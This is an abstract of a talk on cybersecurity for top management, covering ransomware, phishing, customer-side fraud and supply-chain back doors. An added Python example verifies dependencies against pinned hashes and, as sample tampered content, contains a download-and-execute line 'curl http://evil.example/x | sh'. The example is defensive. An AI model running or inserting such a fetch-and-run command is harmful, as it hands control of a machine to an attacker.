Rustem Khairetdinov, Growth Director at BI.Zone, talks about the role of top management in ensuring cybersecurity, the main types of damage from cyber attacks, penetration scenarios and how to set goals for the information security department.
Details are in the video and in the abstract of the talk below.
The open practical course "Digital Security for Business Leaders" is available on the website of the Universitet project.
There is no business without digital technology anymore. The problem of security has ceased to be a problem for IT specialists and security officers alone. It is a problem for the top management of a company, regardless of its size.
If a company has something that can be extorted and it is cheaper for it to pay, then, of course, it will be attacked (by encrypting its systems, ed.). When hackers break into some digital system, the first thing they look for is money. The next attempt is to steal data. And if it is no longer possible to steal the data, then there is this gesture of desperation: encryption.
Sometimes even rival groups can be sitting in one company: one got in, the other also got in, found the other one and started trying to clean it out, because this is its turf: "we milk this client, sorry". And we sometimes see such wars of criminals among themselves over who gets to rob the train, as it was in the Wild West. Sorry, this is our train!
Phishing is a way to get a person to enter their details, compromise their account, and so on. And I am sure that anyone can be caught if you seriously engage with it and draw up their psychological portrait.
The task of attackers is to break a hole in the company. And most often the weakest link in IT security is the person.
If we talk about other ways of causing damage, it all depends on the business; that is where contextual threats begin. For example, if we talk about government websites, a rather serious threat there is the publication of messages on government websites that can lead to something: a fall in the exchange rate, some kind of panic.
Today one of the vectors is submitting fake information on behalf of hacked sources. It is necessary to protect trusted sources of information, your company's websites, where you can state your position.
Each company has its own systems and its own data. If you break into a bank, you need to steal money. The regulator has put a lot of effort into making it almost impossible today to break into a bank head-on. And so today the main attack vector against banks is the bank's customers. That is, it is easier to hack your phone or to pretend to be a security officer than to break into the bank.
For e-commerce companies other kinds of damage are possible: you cannot steal money there, but you can, for example, order goods from a stolen account.
There is another topic: returns. A man bought something, it was delivered to him, and he says: I opened the box and there is a brick instead of an iPhone, please refund my money. And the litigation begins. Such things amount to hundreds of millions of rubles a year.
The two main vectors are phishing and vulnerabilities: social engineering and vulnerabilities.
In fact, not everyone is attacked en masse, but, for example, everyone who has a specific piece of software with a specific vulnerability is.
A targeted attack on a specific company can only be carried out by a criminal group with huge resources. But breaking in through vulnerabilities in specific software is quite simple.
The defence strategy in cyberspace is very similar to the strategy of a gazelle running from a lion: it must run faster than the slowest gazelle.
You can achieve absolute security, but for that you need to switch off the computer and put it in a safe, and then the business will not work.
If you comply with the regulator's requirements, the regulator has already made sure that by complying with them you have built yourself a basic level of protection. And then they proceed from the fact that if you process secret data, those are one set of requirements; personal data, another set; if you have introduced a trade secret regime, there is a fourth set, a fifth set. Actually there is this rule: if you do not know how to do it, act according to the law.
When talking about the cybersecurity approach for business, business usually means: I pay money and I will be protected. But often the most that security people can do is not to prevent something, but to minimise the damage once an attack is already under way, and then to investigate and learn a lesson.
You cannot just buy some protection that will always protect you. It needs to be tuned and adapted. And there must be people: not only tools, but also people who handle them.
The employer should pay particular attention to raising digital literacy, so that employees are not that same gap, that same low-quality mortar because of which this whole wall, all these bricks, can simply crumble at some point and leave the company completely naked.
In principle, of course, people should not just be taught; listening to a course is good, but people need to be trained. I would even say, in a good sense, provoked.
People should not just know; it should be in their blood, in their skills. If you do not make a person do something several times and, if he does it incorrectly, do not send him for additional study, it will not stick.
Digital skills are the same kind of skills as washing your hands. It is the same hygiene, only in cyberspace.
How should you behave if you use a banking application? At the very least, do not hand your unlocked phone to the wrong hands, even to take a picture. Especially for this there is a "photo in locked mode" mode.
Security is considered the antonym of convenience.
A vulnerability is a hole, and an exploit is the key to it that lets you through.
Today 80-90% of the code is not your own code. And therefore, by the way, programmers will be replaced by robots faster than … Searching for someone else's code and building something from it is much easier than programming from scratch. Therefore there are such attack methods, and have been for a long time: they put it on an open-source site and, roughly speaking, companies compromised themselves.
People themselves built in someone else's back door, that is, they built in this back door simply without checking what kind of software it was. So, since we were talking about cement, the brick also needs to be checked, if we are building a wall.
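The "check the brick" point above, as an added example that is not part of the talk or of any BI.Zone tooling: before a third-party artifact is built into a product, its SHA-256 is compared against a hash pinned in a lockfile, and anything unpinned, unknown or mismatching fails the build. The lockfile format (`name==version --hash=sha256:...`) follows pip's hash-pinning style; the archive bytes, the package names `tiny-lib`, `other-lib` and `surprise-lib`, and the lockfile itself are constructed in memory so the example runs offline.

```python
"""Verify third-party artifacts against pinned SHA-256 hashes before building them in.

Added example, not from the talk. Lockfile lines mirror pip's hash-pinning style.
All archives and the lockfile are constructed in memory (not real packages).
"""
import hashlib
import re

# Constructed stand-ins for two downloads of the same dependency: the genuine
# release, and a copy into which someone has appended a back door.
GOOD_ARCHIVE = b"tiny-lib-1.2.0: genuine upstream release\n"
TAMPERED_ARCHIVE = GOOD_ARCHIVE + b"curl http://evil.example/x | sh\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed lockfile. tiny-lib is pinned to the genuine archive's hash;
# other-lib is deliberately left without a hash to show the fail-closed path.
LOCKFILE = f"""
# dependencies reviewed and pinned by the team
tiny-lib==1.2.0 --hash=sha256:{sha256_hex(GOOD_ARCHIVE)}
other-lib==0.9.1
"""

_LINE_RE = re.compile(
    r"^(?P<name>[A-Za-z0-9_.\-]+)==(?P<version>\S+)"
    r"(?P<hashes>(\s+--hash=sha256:[0-9a-f]{64})*)\s*$"
)


def parse_lockfile(text: str) -> dict:
    """Return {name: {"version": str, "hashes": set}} and reject malformed lines."""
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE_RE.match(line)
        if not m:
            raise ValueError(f"malformed lockfile line: {line!r}")
        hashes = set(re.findall(r"--hash=sha256:([0-9a-f]{64})", m.group("hashes")))
        entries[m.group("name")] = {"version": m.group("version"), "hashes": hashes}
    return entries


def verify_artifacts(lockfile_text: str, artifacts: dict) -> dict:
    """Map each downloaded artifact name to a verdict.

    "ok"              hash matches one of the pinned hashes
    "hash-mismatch"   contents differ from what was reviewed (tampered or swapped)
    "unpinned"        listed without a hash: fail closed rather than trust it
    "not-in-lockfile" an artifact nobody asked for
    """
    pinned = parse_lockfile(lockfile_text)
    verdicts = {}
    for name, data in artifacts.items():
        entry = pinned.get(name)
        if entry is None:
            verdicts[name] = "not-in-lockfile"
        elif not entry["hashes"]:
            verdicts[name] = "unpinned"
        elif sha256_hex(data) in entry["hashes"]:
            verdicts[name] = "ok"
        else:
            verdicts[name] = "hash-mismatch"
    return verdicts


def build_allowed(verdicts: dict) -> bool:
    """Only an all-"ok" set of artifacts may be built into the product."""
    return bool(verdicts) and all(v == "ok" for v in verdicts.values())


if __name__ == "__main__":
    downloads = {
        "tiny-lib": TAMPERED_ARCHIVE,
        "other-lib": b"other-lib 0.9.1 contents",
        "surprise-lib": b"nobody pinned me",
    }
    result = verify_artifacts(LOCKFILE, downloads)
    for name, verdict in result.items():
        print(f"{name}: {verdict}")
    print("build allowed:", build_allowed(result))
```

The point of the fail-closed verdicts is that a missing hash is treated the same way as a wrong one: a dependency that was never reviewed and pinned is exactly the unchecked brick the speaker describes.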
Basically, penetration into a system begins much earlier than the attack itself, because you need to prepare for the attack. When something is already breaking down the door, it means that, in principle, you had a chance to gather, to start, to recruit a squad and to meet them fully armed, not allowing them to reach the wall: give battle in the open field or, at long range, throw arrows, not allowing them to approach the gate.
A good fire is one that did not happen; we extinguished it before the moment it flared up.
Today any sabotage is internal, because a hacker always has a voluntary or unwitting accomplice. This is a person who configured something poorly, rolled out crooked software, opened an unnecessary link. Hardware does not fail; the people who test this hardware fail.